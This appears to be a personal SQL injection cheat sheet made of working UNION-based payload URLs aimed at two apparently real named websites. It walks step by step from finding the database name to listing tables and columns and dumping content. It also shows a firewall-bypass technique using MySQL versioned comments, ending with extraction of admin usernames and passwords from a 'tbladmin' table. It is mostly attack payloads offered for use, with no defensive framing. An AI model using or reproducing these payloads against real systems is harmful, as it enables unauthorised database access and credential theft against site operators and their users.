sql basic 
1`or`1`=`1
sql blind
to get database:-

http://www.icd.org.pk/course.php?id=-16' UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -
to get data 

to get tables:-

http://www.icd.org.pk/course.php?id=-16' UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.table_constraints-- -

to get columns:- 

http://www.icd.org.pk/course.php?id=-16' UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_name='icd_courses'-- -

to get data after columns:- 

http://www.icd.org.pk/course.php?id=-16' UNION SELECT 1,2,group_concat(course_category,url,short_description,image,content),4,5,6,7,8,9,10,11,12,13,14,15,16 from icd_courses-- -

# to reformate data we need to add 0x3a (a hex code)

http://www.icd.org.pk/course.php?id=-16' UNION SELECT 1,2,group_concat(course_category,0x3a,url,0x3a,short_description,0x3a,image,0x3a,content),4,5,6,7,8,9,10,11,12,13,14,15,16 from icd_courses-- -
ss

##to bypass firewall site's 

http://www.piil.com.pk/new.php?id=25 /*!12345UNION SELECT*/ 1,2,3,4,5,6,7,8-- -

#"/**/ " firewall of server blocks UNION words so we have to comment it by /**/

to get database:- 
http://www.piil.com.pk/new.php?id=25 /*!12345UNION SELECT*/ 1,database(),3,4,5,6,7,8--%20-

to get tables :-

http://www.piil.com.pk/new.php?id=25 /*!12345UNION SELECT*/ 1,table_name,3,5,6,7,8 from /*!12345information_schema.table_constraints*/-- -


to get columns :-

http://www.piil.com.pk/new.php?id=25 /*!12345UNION SELECT*/ 1,column_name,3,4,5,6,7,8 from /*!12345information_schema.columns*/ where table_name='tbladmin'-- -

to get pass :-

http://www.piil.com.pk/new.php?id=25 /*!12345UNION SELECT*/ 1,/*!12345GROUP_cOnCaT(adminId,0x3a,userName,0x3a,password)*/,3,4,5,6,7,8 from tbladmin--
